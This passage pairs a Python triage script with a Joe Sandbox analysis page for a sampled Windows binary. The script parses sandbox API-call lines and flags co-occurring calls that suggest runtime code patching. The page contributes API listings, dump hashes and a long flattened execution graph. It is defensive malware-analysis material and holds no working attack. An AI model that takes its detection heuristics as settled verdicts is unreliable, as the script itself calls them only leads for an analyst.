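# Constructed sample: API lines copied from the function entries on this page,
# grouped by the entry they belong to (entry names are hypothetical labels).
SAMPLE_ENTRIES = {
    "func_02CFAD59": [
        "• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59",
        "• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D",
        "• GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98",
        "• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E",
    ],
    "func_02CF9572": [
        "• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02CF95DA), ref: 02CF9572",
        "• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02CF95DA), ref: 02CF9578",
    ],
    "func_02D083A4": [
        "• Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A",
        "• Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E",
        "• Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1",
        "• Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7",
        "• Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9",
        "• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D083C2), ref: 02D083A4",
    ],
}

# Shape of one Joe Sandbox API line: optional bullet, optional subcall prefix,
# then Name.MODULE(arg,arg,...), ref: HEXADDR
API_RE = re.compile(
    r"^•?\s*(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Illustrative co-occurrence rules (assumption: these are the pairs a reviewer
# would want surfaced; they are not Joe Sandbox signatures).
RULES = [
    ("runtime code patching (resolve export, then flush I-cache)",
     {"GetProcAddress", "FlushInstructionCache"}),
    ("manual export resolution (GetModuleHandle + GetProcAddress)",
     {"GetModuleHandleA", "GetProcAddress"}),
]


def parse_api_lines(lines):
    """Parse API lines into dicts; lines that are not API entries are skipped."""
    calls = []
    for line in lines:
        m = API_RE.match(line.strip())
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            # Stack window as printed; '?' marks slots the sandbox could not read.
            "args": [a.strip() for a in m.group("args").split(",") if a.strip()],
            "ref": m.group("ref").upper(),
            "subcall": (m.group("subcall") or "").upper() or None,
        })
    return calls


def _is_name_literal(arg):
    # Anything that is neither an unknown slot nor a hex value is a string the
    # sandbox resolved from the stack, e.g. a module name passed to GetModuleHandle.
    return arg != "?" and re.fullmatch(r"[0-9A-Fa-f]+", arg) is None


def module_names_referenced(calls):
    """Module-name strings visible in the stack window of GetModuleHandleA/W calls."""
    names = set()
    for c in calls:
        if c["api"] in ("GetModuleHandleA", "GetModuleHandleW"):
            names.update(a for a in c["args"] if _is_name_literal(a))
    return names


def triage(entries):
    """Map each entry name to the list of rule labels whose API set it contains."""
    report = {}
    for name, lines in entries.items():
        apis = {c["api"] for c in parse_api_lines(lines)}
        report[name] = [label for label, needed in RULES if needed <= apis]
    return report


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_ENTRIES).items():
        print(name, hits or "no rule matched")
    print(sorted(module_names_referenced(parse_api_lines(SAMPLE_ENTRIES["func_02D083A4"]))))
```

On this page's entries only the GetModuleHandle/GetProcAddress/FlushInstructionCache function trips a rule; the VirtualQuery/GetModuleFileNameA/LoadStringA and GetThreadLocale/GetDateFormatA functions are ordinary runtime-library code and stay quiet. A GetProcAddress followed by FlushInstructionCache in the same function is consistent with writing into executable memory of a loaded module, but the listing alone does not say what was written or why, so the rule label is a lead for the analyst, not a verdict.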
APIs
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D083C2), ref: 02D083A4
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                                                                                                                                                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3811539418-184458249
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a58f34a2a92fc5b5762dda2b2e014f7a57729b5f7c0326b4d614dbf80ab34fc0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b4e98af088740ea4d97628a6e1e527fd1ed8a5d0efb2fb89549398ba1ec71c35
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a58f34a2a92fc5b5762dda2b2e014f7a57729b5f7c0326b4d614dbf80ab34fc0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65016D71740304AFE794EFA4EC81F6B77AEEB48B00F514860BA04D6790D674AD14AB25
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0AF58
                                                                                                                                                                                                                                                                                                                                                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 02D0AF88
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 02D0AFA7
                                                                                                                                                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0AFB3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Read$Write
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3448952669-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 244b848b2e99074664aa410fe8a8193d8993e9ac72f28d1fab7151c0c94c21d4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85216AB264071A9BDB50DE69CDC0BAA7BA9EB80366F108511FE14973D0D774E811CAA0

                                                                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                                                                      Execution Coverage:4%
                                                                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                      Signature Coverage:0.6%
                                                                                                                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:11
execution_graph (flattened rendering of the Execution Graph figure: node addresses, called API names such as RegOpenKeyExW, RegEnumKeyExW, RegSetValueExW, SetUnhandledExceptionFilter, GetModuleHandleW and GetProcAddress, and the edges between nodes)
19059->19059 19062 eedcd0 19059->19062 19061 eeacd8 19061->18754 19063 eedcde GetProcessHeap HeapAlloc 19062->19063 19064 efd9da 19062->19064 19063->19064 19065 eedcf6 19063->19065 19066 ee78e4 446 API calls 19064->19066 19065->19061 19067 efd9e3 19066->19067 19067->19061 19069 ef6e30 __EH_prolog3_catch 19068->19069 19072 ef742d 19069->19072 19071 ef6e48 19071->18757 19073 ef7441 malloc 19072->19073 19074 ef744f 19073->19074 19075 ef7434 _callnewh 19073->19075 19074->19071 19075->19073 19076 ef7451 19075->19076 19079 ef74d1 ??0exception@@QAE@ABQBDH 19076->19079 19078 ef77ec _CxxThrowException 19079->19078 19083 f0345e 19080->19083 19086 f032e4 19083->19086 19087 f032f6 19086->19087 19094 f02e74 19087->19094 19090 f033a9 19091 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19090->19091 19093 f033ba 19091->19093 19093->18769 19095 f02ea3 19094->19095 19097 f02ead 19094->19097 19096 f0345e 9 API calls 19095->19096 19095->19097 19096->19097 19098 f02f1d GetCurrentThreadId 19097->19098 19099 f02f6c 19098->19099 19100 f03061 19099->19100 19110 f02e37 19099->19110 19103 f03036 OutputDebugStringW 19105 f02fe7 19103->19105 19105->19090 19106 f0392b 19105->19106 19107 f0394c memset 19106->19107 19109 f03941 19106->19109 19108 f0397a 19107->19108 19109->19107 19111 f02e42 19110->19111 19113 f02e4e 19110->19113 19112 f02e5d IsDebuggerPresent 19111->19112 19111->19113 19112->19113 19113->19103 19113->19105 19114 f02859 19113->19114 19118 f02885 19114->19118 19140 f02a23 19114->19140 19115 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19116 f02a60 19115->19116 19116->19103 19117 f0290d FormatMessageW 19119 f02963 19117->19119 19120 f0294c 19117->19120 19118->19117 19118->19140 19122 f03067 _vsnwprintf 19119->19122 19143 f03067 19120->19143 19123 f0295e 19122->19123 19124 f0298e GetCurrentThreadId 19123->19124 19126 f03067 _vsnwprintf 19123->19126 19140->19115 19146 ee9a8d 19143->19146 19147 ee9a98 19146->19147 19148 ee9ab4 19147->19148 19149 ee9afb 
_vsnwprintf 19147->19149 19149->19148 19151 eeec64 19150->19151 19152 ee8f0d 19150->19152 19151->19152 19153 eeec71 _wcsicmp 19151->19153 19152->18775 19152->18779 19154 eeec87 _wcsicmp 19153->19154 19164 eeed59 19153->19164 19155 eeec9d _wcsicmp 19154->19155 19156 eeed47 19154->19156 19155->19156 19158 eeecb3 _wcsicmp 19155->19158 19199 ee9abf 19156->19199 19157 ee8e9e 436 API calls 19163 eeed6c 19157->19163 19159 efddef GetCommandLineW 19158->19159 19160 eeecc9 _wcsicmp 19158->19160 19159->19152 19162 eeecdf _wcsicmp 19160->19162 19160->19163 19165 eeed24 19162->19165 19166 eeecf1 _wcsicmp 19162->19166 19203 ee6854 19163->19203 19164->19157 19175 ee9310 19165->19175 19168 efddfa rand 19166->19168 19169 eeed07 _wcsicmp 19166->19169 19168->19156 19169->19152 19172 efde06 GetNumaHighestNodeNumber 19169->19172 19170 eeed30 19170->19152 19242 ef6c78 19170->19242 19172->19156 19176 ee93fe 19175->19176 19177 ee933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19175->19177 19176->19170 19245 f048d7 19176->19245 19179 ee938d 19177->19179 19180 efbbd9 19177->19180 19182 efbbcc 19179->19182 19183 ee93cd 19179->19183 19194 efbbd1 19180->19194 19251 ee8791 GetUserDefaultLCID 19180->19251 19184 ee9950 441 API calls 19182->19184 19186 ee9abf _vsnwprintf 19183->19186 19184->19194 19188 ee93d6 19186->19188 19191 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19188->19191 19189 ee9abf _vsnwprintf 19189->19194 19190 efbd10 19192 ee8791 GetUserDefaultLCID 19190->19192 19191->19176 19194->19189 19196 efbdbf 19194->19196 19253 ee998d 19194->19253 19196->19196 19197 efbc11 19197->19190 19197->19197 19198 efbcd0 memmove 19197->19198 19198->19197 19200 ee9acd 19199->19200 19201 ee9aee 19200->19201 19289 ee9afb _vsnwprintf 19200->19289 19201->19164 19204 ee688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19203->19204 19235 ee6b0c 19203->19235 19205 ee68ec 19204->19205 19227 efa562 19204->19227 19207 
ee8791 GetUserDefaultLCID 19205->19207 19206 f048d7 6 API calls 19208 efa4c2 19206->19208 19209 ee6906 GetLocaleInfoW 19207->19209 19208->19170 19222 ee6915 19209->19222 19210 efa5f9 19214 ee9abf _vsnwprintf 19210->19214 19211 efa5df realloc 19211->19210 19211->19227 19212 ee6966 19213 ee8791 GetUserDefaultLCID 19212->19213 19215 ee698e GetDateFormatW 19213->19215 19216 efa62a 19214->19216 19217 ee699d 19215->19217 19218 ee6a96 19215->19218 19223 efa63e 19216->19223 19233 efa64d 19216->19233 19217->19218 19226 ee69ab 19217->19226 19220 ee8791 GetUserDefaultLCID 19218->19220 19219 ee78e4 434 API calls 19219->19227 19221 ee6aae GetDateFormatW 19220->19221 19222->19212 19231 efa523 memmove 19222->19231 19234 ee6a75 memmove 19222->19234 19228 ee9950 434 API calls 19223->19228 19226->19216 19227->19210 19227->19211 19227->19219 19238 efa649 19228->19238 19231->19222 19237 ee9950 434 API calls 19233->19237 19234->19222 19235->19206 19237->19238 19291 ef6b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19242->19291 19244 eeed88 19244->19159 19246 f048f0 GetSystemTime 19245->19246 19247 f048fc 19245->19247 19248 f0493b SystemTimeToFileTime 19246->19248 19247->19248 19249 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19248->19249 19250 efbbc7 19249->19250 19250->19170 19252 ee87a5 GetLocaleInfoW 19251->19252 19252->19197 19254 ee99a0 19253->19254 19276 ee99d0 19253->19276 19255 ee9a11 6 API calls 19254->19255 19256 ee99a8 19255->19256 19276->19194 19290 ee9b1f 19289->19290 19290->19201 19291->19244 19293 eea986 19292->19293 19294 eea9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19292->19294 19293->19294 19295 eea9d4 5 API calls 19294->19295 19296 eea9c5 19295->19296 19296->18793 20238 eea8e6 20237->20238 20239 eecc70 548 API calls 20238->20239 20240 eea8f8 20239->20240 20241 eea90c 20240->20241 20242 ef80ba longjmp 20240->20242 20283 eebab0 20241->20283 20244 ef80c8 20242->20244 20296 eed660 
EnterCriticalSection LeaveCriticalSection 20244->20296 20246 eea911 20246->18608 20247 ef80cd 20247->18608 20249 eecc7a 20248->20249 20250 eecf10 547 API calls 20249->20250 20251 eecc8a 20250->20251 20252 efd434 longjmp 20251->20252 20253 eecc9b 20251->20253 20252->20253 20253->20253 20254 ee9950 448 API calls 20253->20254 20255 eeccc4 20253->20255 20256 efd45b 20254->20256 20255->18607 20258 f08996 20257->20258 20259 f0898e 20257->20259 20260 f089b2 20258->20260 20261 f089a2 20258->20261 20263 f089db 20259->20263 20264 f089ce longjmp 20259->20264 20260->20259 20265 ee78e4 448 API calls 20260->20265 20262 ee78e4 448 API calls 20261->20262 20262->20259 20263->18606 20264->20263 20265->20259 20282 f087a0 20266->20282 20267 ee9950 448 API calls 20267->20282 20268 f08900 20270 ee9950 448 API calls 20268->20270 20269 f08930 20272 ee9950 448 API calls 20269->20272 20274 f0890f 20270->20274 20271 f088be 20271->20268 20275 f088c3 20271->20275 20276 f0892e 20272->20276 20277 f08925 20274->20277 20278 ee9950 448 API calls 20274->20278 20275->20269 20279 f088d2 20275->20279 20276->18612 20848 f0871d 20277->20848 20278->20277 20855 f086e6 20279->20855 20281 f08791 448 API calls 20281->20282 20282->20267 20282->20268 20282->20269 20282->20271 20282->20276 20282->20279 20282->20281 20292 eebb19 20283->20292 20295 eebac2 20283->20295 20284 eebadc _wcsicmp 20285 eebaf3 20284->20285 20287 eebb68 20284->20287 20288 eebb56 20285->20288 20381 eeccd0 20285->20381 20287->20285 20291 eecc70 548 API calls 20287->20291 20288->20246 20289 eebb15 20289->20246 20290 eecc70 548 API calls 20290->20292 20291->20287 20292->20290 20293 eebb48 20292->20293 20292->20295 20293->20288 20294 eecc70 548 API calls 20293->20294 20294->20295 20295->20284 20295->20285 20297 eed6b0 20296->20297 20298 efd587 20297->20298 20300 eed6c6 EnterCriticalSection LeaveCriticalSection 20297->20300 20301 eed971 20297->20301 20299 efd59b 20298->20299 20302 ee63bd 448 API calls 20298->20302 20691 f0769e 20299->20691 20304 
efd5a8 20300->20304 20305 eed6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20300->20305 20669 eeda30 20301->20669 20302->20299 20724 f09fcf _get_osfhandle GetFileType 20304->20724 20308 eed752 20305->20308 20309 eed81c 20308->20309 20313 efd742 memcmp 20308->20313 20320 eed774 20308->20320 20315 eed9f7 GetLastError 20309->20315 20325 eed82c 20309->20325 20310 efd5be 20312 efd6bd 20310->20312 20316 eedd98 6 API calls 20310->20316 20311 eed980 20311->20247 20312->20308 20314 efd6c6 _get_osfhandle 20312->20314 20322 efd6ef GetLastError 20312->20322 20312->20325 20313->20320 20318 f045f9 10 API calls 20314->20318 20315->20325 20317 efd5cd 20316->20317 20317->20312 20319 efd5de 20317->20319 20318->20312 20319->20305 20324 eedd98 6 API calls 20319->20324 20321 efd78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20320->20321 20323 eed7b2 20320->20323 20326 eed7bd SetFilePointer 20320->20326 20321->20323 20331 eed809 20321->20331 20322->20308 20322->20312 20328 eed7ec MultiByteToWideChar 20323->20328 20329 efd7e9 20323->20329 20323->20331 20330 efd5f2 20324->20330 20335 eedd98 6 API calls 20325->20335 20351 eed840 20325->20351 20326->20323 20328->20331 20332 efd7f0 EnterCriticalSection LeaveCriticalSection longjmp 20329->20332 20333 efd6b3 20330->20333 20336 efd607 20330->20336 20331->20309 20331->20332 20332->20325 20333->20305 20334 eed893 20334->20247 20337 efd826 20335->20337 20338 efd61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20336->20338 20339 efd610 20336->20339 20342 f09922 448 API calls 20337->20342 20337->20351 20341 f04191 448 API calls 20338->20341 20725 f07613 _get_osfhandle 20339->20725 20343 efd665 20341->20343 20344 efd84f longjmp 20342->20344 20343->20315 20345 efd66d 20343->20345 20344->20351 20345->20325 20348 efd677 GetLastError 20345->20348 20346 eed8f6 20354 eed9e3 20346->20354 20357 eed904 20346->20357 20347 eed8d7 wcschr 20347->20346 20347->20351 20349 efd69e 20348->20349 20350 efd689 
20348->20350 20353 ee9950 448 API calls 20349->20353 20352 ee9950 448 API calls 20350->20352 20351->20334 20351->20346 20351->20347 20356 efd68e longjmp 20352->20356 20353->20325 20354->20301 20361 eed9eb 20354->20361 20355 efd908 20355->20247 20356->20349 20357->20355 20359 eedd98 6 API calls 20357->20359 20358 efd8d3 20360 ee78e4 448 API calls 20358->20360 20363 eed945 20359->20363 20364 efd8df 20360->20364 20361->20358 20362 efd8af 20361->20362 20365 f0769e 458 API calls 20361->20365 20366 ee78e4 448 API calls 20362->20366 20363->20301 20367 eed949 _get_osfhandle SetFilePointer 20363->20367 20368 efd8fb longjmp 20364->20368 20371 eedd98 6 API calls 20364->20371 20369 efd898 20365->20369 20370 efd8be 20366->20370 20367->20301 20378 efd915 20367->20378 20368->20355 20372 ee9950 448 API calls 20369->20372 20373 f09922 448 API calls 20370->20373 20374 efd8f2 20371->20374 20375 efd8a2 20372->20375 20376 efd8c6 longjmp 20373->20376 20374->20368 20730 f0a0da 20374->20730 20377 ee9950 448 API calls 20375->20377 20376->20358 20377->20362 20378->20301 20380 ee998d 448 API calls 20378->20380 20380->20301 20382 eecce9 20381->20382 20383 eecd14 20381->20383 20384 eecde8 20382->20384 20385 eeccf5 20382->20385 20424 eede30 20383->20424 20495 eee090 20384->20495 20388 eecdf2 20385->20388 20389 eecd01 20385->20389 20498 eee210 20388->20498 20393 eecd12 20389->20393 20421 eee230 20389->20421 20391 eecddd 20391->20289 20393->20391 20440 eecf10 _setjmp3 20393->20440 20395 eecd48 20396 efd478 longjmp 20395->20396 20397 eecd59 20395->20397 20398 efd48f 20396->20398 20397->20398 20404 eecd85 20397->20404 20399 ee9950 448 API calls 20398->20399 20400 efd49f 20399->20400 20401 f09922 448 API calls 20400->20401 20402 efd4ac longjmp 20401->20402 20405 efd4ba 20402->20405 20403 eece4a 20407 eecc70 548 API calls 20403->20407 20412 eece61 20403->20412 20416 eece6c 20403->20416 20404->20403 20406 eecdd2 20404->20406 20408 ee9950 448 API calls 20405->20408 20409 eecf10 547 API calls 
20406->20409 20407->20403 20411 efd4ca 20408->20411 20409->20391 20410 eedcd0 448 API calls 20413 eece89 20410->20413 20411->20289 20414 eecf10 547 API calls 20412->20414 20413->20400 20415 eece93 20413->20415 20414->20416 20417 eecc70 548 API calls 20415->20417 20416->20391 20416->20410 20418 eeceac 20417->20418 20419 eebab0 574 API calls 20418->20419 20420 eecec6 20418->20420 20419->20420 20420->20289 20422 eeccd0 576 API calls 20421->20422 20423 eee247 20422->20423 20423->20393 20501 eeded0 20424->20501 20426 eede4a 20427 efda16 20426->20427 20428 eede52 20426->20428 20430 eecc70 548 API calls 20427->20430 20519 eee0b0 20428->20519 20433 eede57 20430->20433 20431 eede64 20432 eecc70 548 API calls 20431->20432 20438 eede92 20431->20438 20434 eede75 20432->20434 20433->20431 20436 f08959 449 API calls 20433->20436 20435 eeded0 554 API calls 20434->20435 20437 eede80 20435->20437 20436->20431 20437->20438 20439 eecf10 547 API calls 20437->20439 20438->20393 20439->20438 20441 efd56e 20440->20441 20445 eecf38 20440->20445 20442 eed03b 20443 eed048 20442->20443 20446 ee9950 448 API calls 20442->20446 20443->20395 20444 eecf9e 20449 eed600 532 API calls 20444->20449 20445->20441 20445->20442 20445->20444 20453 eecf86 wcschr 20445->20453 20482 eed0fa 20445->20482 20664 eed600 20445->20664 20448 efd4ca 20446->20448 20448->20395 20450 eecfb7 20449->20450 20452 efd4d2 20450->20452 20456 eecfc7 20450->20456 20451 eecf67 iswspace 20451->20445 20454 eed600 532 API calls 20452->20454 20452->20482 20453->20444 20453->20445 20455 efd4ea 20454->20455 20465 eed600 532 API calls 20455->20465 20457 eecfe2 iswdigit 20456->20457 20459 eed0a6 20456->20459 20463 eed4a7 20456->20463 20456->20482 20458 eecfff 20457->20458 20483 eed341 20457->20483 20466 eed600 532 API calls 20458->20466 20474 eed027 20458->20474 20468 eed0e8 iswdigit 20459->20468 20469 eed0b5 iswspace 20459->20469 20459->20483 20460 eed218 20460->20395 20461 eed600 532 API calls 20461->20483 20462 eed190 20462->20460 
20464 ee78e4 448 API calls 20462->20464 20467 eed600 532 API calls 20463->20467 20464->20441 20465->20483 20470 eed2a5 20466->20470 20471 eed4ac 20467->20471 20473 eed310 20468->20473 20468->20482 20469->20457 20472 eed0c7 20469->20472 20479 eed600 532 API calls 20470->20479 20484 eed2ae 20470->20484 20471->20442 20471->20455 20471->20457 20471->20482 20476 eed0d0 wcschr 20472->20476 20472->20482 20475 eed328 iswspace 20473->20475 20473->20483 20474->20395 20480 eed484 20475->20480 20475->20483 20476->20457 20476->20468 20477 eed16d iswdigit 20477->20482 20478 eed1b4 iswspace 20478->20462 20478->20482 20479->20484 20481 eea62f wcschr 20480->20481 20481->20483 20482->20458 20482->20462 20482->20477 20482->20478 20485 eed23e iswspace 20482->20485 20486 eed1d1 wcschr 20482->20486 20490 eed600 532 API calls 20482->20490 20483->20457 20483->20461 20483->20482 20484->20474 20487 eed600 532 API calls 20484->20487 20491 eea62f wcschr 20484->20491 20492 eed426 iswdigit 20484->20492 20485->20482 20488 eed253 wcschr 20485->20488 20486->20462 20486->20477 20489 eed405 iswspace 20487->20489 20488->20482 20489->20484 20490->20482 20491->20484 20492->20474 20493 eed438 20492->20493 20494 eed600 532 API calls 20493->20494 20494->20474 20496 eeccd0 576 API calls 20495->20496 20497 eee0a7 20496->20497 20497->20393 20499 eeccd0 576 API calls 20498->20499 20500 eee227 20499->20500 20500->20393 20514 eedf00 20501->20514 20502 eedf16 iswdigit 20504 eedf27 20502->20504 20502->20514 20503 eedcd0 448 API calls 20503->20514 20507 eedf2f 20504->20507 20508 eecf10 547 API calls 20504->20508 20505 efdaf9 longjmp 20510 eee26b 20505->20510 20506 eedf63 iswdigit 20506->20514 20507->20426 20508->20507 20509 efdaec 20511 f08959 449 API calls 20509->20511 20510->20426 20512 efdaf1 20511->20512 20512->20505 20514->20502 20514->20503 20514->20504 20514->20505 20514->20506 20514->20509 20515 eee059 iswdigit 20514->20515 20516 f08959 449 API calls 20514->20516 20517 eeacb0 448 API calls 20514->20517 
20518 eecc70 548 API calls 20514->20518 20591 eea931 20514->20591 20515->20514 20516->20514 20517->20514 20518->20514 20520 eee15b 20519->20520 20521 eee0c1 _wcsicmp 20519->20521 20525 eedcd0 448 API calls 20520->20525 20526 eee1db 20520->20526 20522 eee0dc _wcsicmp 20521->20522 20523 eee203 _wcsicmp 20521->20523 20522->20523 20527 eee0f7 _wcsicmp 20522->20527 20529 ef2a35 20523->20529 20574 ef2a63 20523->20574 20530 eee17d 20525->20530 20531 f08959 449 API calls 20526->20531 20549 eee1e0 20526->20549 20527->20520 20528 eee112 _wcsicmp 20527->20528 20528->20520 20532 eee12d _wcsicmp 20528->20532 20608 eebb90 20529->20608 20534 ef9ca7 20530->20534 20547 eee187 20530->20547 20535 eee1f5 20531->20535 20532->20520 20536 eee144 _wcsicmp 20532->20536 20539 f09922 448 API calls 20534->20539 20535->20433 20536->20520 20537 ef2a47 20542 eecc70 548 API calls 20537->20542 20537->20574 20538 eee1bf 20541 eea8c4 562 API calls 20538->20541 20540 ef9cac longjmp 20539->20540 20557 ee5e22 20540->20557 20545 eee1c9 20541->20545 20546 ef2a5b 20542->20546 20543 eecc70 548 API calls 20543->20547 20544 ee5e1d 20544->20433 20545->20549 20553 eecc70 548 API calls 20545->20553 20623 ee9907 20546->20623 20547->20538 20547->20543 20548 eee1b4 20547->20548 20552 eecf10 547 API calls 20548->20552 20549->20433 20551 ee5da6 448 API calls 20551->20557 20552->20538 20553->20526 20554 ee8f21 448 API calls 20554->20557 20555 ef2a7c _wcsicmp 20560 ef2a92 _wcsicmp 20555->20560 20555->20574 20556 ef2ae4 20558 ef2af4 iswspace 20556->20558 20559 eff500 20556->20559 20557->20544 20557->20551 20557->20554 20562 ee5e61 20557->20562 20558->20559 20561 ef2b0b 20558->20561 20563 f08959 449 API calls 20559->20563 20564 ef2aa8 _wcsicmp 20560->20564 20560->20574 20567 eea62f wcschr 20561->20567 20568 f08c50 448 API calls 20562->20568 20569 ef2b81 20563->20569 20570 ef2abe _wcsicmp 20564->20570 20564->20574 20565 eedcd0 448 API calls 20565->20574 20566 eecc70 548 API calls 20566->20574 20571 ef2b1f 20567->20571 
